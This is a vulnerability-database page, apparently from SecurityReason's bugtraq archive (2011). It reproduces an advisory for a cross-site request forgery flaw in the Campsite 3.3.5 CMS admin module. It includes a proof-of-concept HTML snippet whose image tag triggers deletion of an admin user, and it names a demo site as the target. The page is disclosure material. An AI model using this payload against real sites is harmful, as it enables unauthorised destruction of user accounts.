|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : Pratul Agrawal SecurityRisk : Low  (About) Remote : Yes Local : No Status : Bug
Text : campsite 3.3.5 CSRF Vulnerability by Pratul Agrawal # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Category CMS / Portals # Site p4ge http://campsite-demo.campware.org/admin/login.php # Plateform php # Proof of concept # Targeted URL: http://campsite-demo.campware.org/admin/login.php Script to delete the Admin user through Cross Site request forgery . ........................................................................... ....................................... <html> <body> <img src=http://campsite-demo.campware.org/admin/users/do_del.php?User=[userID]& amp;uType=Staff /> </body> </html> . ........................................................................... ....................................... After execution refresh the page and u can see that user having giving ID get deleted automatically. #If you have any questions, comments, or concerns, feel free to contact me. Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |